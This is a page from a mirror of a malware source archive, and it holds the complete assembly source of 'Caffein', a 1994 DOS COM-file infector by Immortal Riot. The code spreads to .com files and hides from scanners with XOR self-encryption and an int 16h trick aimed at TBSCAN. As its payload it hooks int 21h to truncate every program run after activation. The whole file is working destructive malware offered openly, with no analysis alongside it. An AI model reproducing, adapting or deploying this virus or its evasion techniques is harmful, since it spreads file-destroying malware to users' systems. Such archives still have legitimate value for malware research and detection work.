mirror of
https://github.com/vxunderground/MalwareSourceCode
synced 2024-06-28 18:02:48 +00:00
214 lines
6.2 KiB
NASM
214 lines
6.2 KiB
NASM
; ------------------------------------------------------------------------------
|
|
;
|
|
; - Caffein -
|
|
; Created by Immortal Riot's destructive development team
|
|
; (c) 1994 The Unforgiven/Immortal Riot
|
|
;
|
|
; ------------------------------------------------------------------------------
|
|
; þ Undetectable/Destructive COM-infector þ
|
|
; ------------------------------------------------------------------------------
|
|
.model tiny
|
|
.code
|
|
org 100h
|
|
|
|
v_start:
|
|
|
|
firstgenbuffer db 0e9h,00h,00h
|
|
|
|
virus_start:
|
|
|
|
mov bp,0000h ; get delta offset
|
|
|
|
call trick_tbscan ;
|
|
call decrypt ; decrypt virus
|
|
jmp short real_start ; and continue..
|
|
|
|
trick_tbscan:
|
|
|
|
mov ax,0305h ; set keyb i/o
|
|
xor bx,bx ; too beat the
|
|
int 16h ; shit outta tbscan
|
|
ret
|
|
|
|
write_virus:
|
|
|
|
call encrypt ; write in encrypted mode
|
|
lea dx,[bp+virus_start] ; from start to virus end
|
|
mov cx,virus_end-virus_start ; bytes to write
|
|
mov ah,40h ; 40hex!
|
|
int 21h
|
|
call decrypt ; decrypt virus again
|
|
ret
|
|
|
|
crypt_value dw 0
|
|
|
|
decrypt:
|
|
encrypt:
|
|
|
|
mov dx,word ptr [bp+crypt_value] ; simple xor-encryption
|
|
lea si,[bp+real_start] ; routine included to
|
|
mov cx,(virus_end-virus_start+1)/2 ; avoid detection by scanners.
|
|
|
|
xor_word:
|
|
|
|
xor word ptr [si],dx ; encrypt all of the code!
|
|
inc si
|
|
inc si
|
|
loop xor_word
|
|
ret
|
|
|
|
real_start:
|
|
|
|
mov di,100h ; transer the first three
|
|
lea si,[bp+orgbuf] ; bytes into a buffer
|
|
movsw
|
|
movsb
|
|
|
|
lea dx,[bp+new_dta] ; set's the dta...
|
|
mov ah,1ah
|
|
int 21h
|
|
|
|
mov ah,4eh ; find first file
|
|
|
|
commm: lea dx,[bp+com_files]
|
|
next: int 21h
|
|
jnc foundfile
|
|
jmp chk_cond
|
|
|
|
foundfile:
|
|
|
|
mov ax,word ptr [bp+new_dta+16h] ; ask file-time
|
|
and al,00011111b
|
|
cmp al,00000010b ; compare second-value
|
|
jne infect ; not equal - infect!
|
|
|
|
mov ah,4fh ; otherwise, search
|
|
jmp short commm ; next file in directory
|
|
|
|
infect:
|
|
|
|
lea dx,[bp+new_dta+1eh] ; clear file-attribute
|
|
xor cx,cx
|
|
mov ax,4301h
|
|
int 21h
|
|
|
|
mov ax,3d02h ; open file
|
|
int 21h ; in read/write mode
|
|
|
|
xchg ax,bx ; file handle in bx
|
|
|
|
mov ah,3fh ; read 3 bytes
|
|
mov cx,3 ; from orgbuf
|
|
lea dx,[bp+orgbuf]
|
|
int 21h
|
|
|
|
mov ax,4202h ; move file-pointer
|
|
xor cx,cx ; to end of file
|
|
cwd
|
|
int 21h
|
|
|
|
cmp ax,666d ; check if file is
|
|
jb too_small ; too small
|
|
|
|
cmp ax,64000d ; or too big
|
|
ja too_big ; to infect
|
|
|
|
sub ax,3
|
|
mov word ptr [bp+virus_start+1],ax ; create a new jump
|
|
mov word ptr [bp+newbuf+1],ax
|
|
|
|
mov ah,2ch ; get random
|
|
int 21h ; value to use
|
|
mov word ptr [bp+crypt_value],dx ; as the xor
|
|
call write_virus ; value
|
|
|
|
mov ax,4200h ; move file-pointer
|
|
xor cx,cx ; to tof of file
|
|
cwd
|
|
int 21h
|
|
|
|
mov ah,40h ; write the new jump
|
|
lea dx,[bp+newbuf] ;
|
|
mov cx,3
|
|
int 21h
|
|
|
|
too_small:
|
|
too_big:
|
|
|
|
mov dx,word ptr [bp+new_dta+18h] ; restore file's date
|
|
mov cx,word ptr [bp+new_dta+16h] ; and time and
|
|
and cl,11100000b ; mark the file
|
|
or cl,00000010b ; as infected
|
|
mov ax,5701h
|
|
int 21h
|
|
|
|
mov ah,3eh ; close file
|
|
int 21h
|
|
|
|
lea dx,[bp+new_dta+1eh] ; and put back
|
|
xor ch,ch ; the file-attributes
|
|
mov cl,byte ptr [bp+new_dta+15h]
|
|
mov ax,4301h
|
|
int 21h
|
|
|
|
nextfile:
|
|
|
|
mov ah,4fh ; seek next file
|
|
jmp next
|
|
|
|
chk_cond:
|
|
|
|
mov ah,2ch ; check if we should
|
|
int 21h ; make the pay-load
|
|
cmp dl,4d ; activate
|
|
jb resident
|
|
jmp short reset_dta
|
|
|
|
newint21h proc far ; this code is memory resident
|
|
|
|
cmp ax,4b00h ; check for execute
|
|
je create ; matched
|
|
jmp cs:oldint21h ; naaw
|
|
create:
|
|
mov ah,3ch ; truncate the file executed
|
|
int 21h ; and give it full-attribute
|
|
int 20h ; and just exit to dos
|
|
|
|
newint21h endp
|
|
|
|
in_mem:
|
|
resident:
|
|
|
|
mov ax,3521h ; get original vector from
|
|
int 21h ; es:bx to int21h
|
|
|
|
mov word ptr cs:oldint21h,bx
|
|
mov word ptr cs:oldint21h+2,es
|
|
|
|
mov ax,2521h ; set a new interrupt vector
|
|
lea dx,[bp+offset newint21h] ; for int21h to ds:dx
|
|
int 21h
|
|
|
|
lea dx,[bp+offset in_mem] ; and load it resident
|
|
int 27h
|
|
int 20h ; and exit
|
|
|
|
reset_dta:
|
|
|
|
mov dx,80h ; puts back the dta to normal
|
|
mov ah,1ah
|
|
int 21h
|
|
|
|
mov ax,100h
|
|
jmp ax
|
|
|
|
signature db "[Caffeine] (c) 1994 The Unforgiven/Immortal Riot"
|
|
com_files db '*.com',0
|
|
orgbuf db 0cdh,20h,90h ; buffer to save first 3 bytes
|
|
newbuf db 0e9h,00h,00h ; buffer to calculate new entry
|
|
oldint21h dd 0
|
|
|
|
virus_end:
|
|
new_dta:
|
|
end v_start
|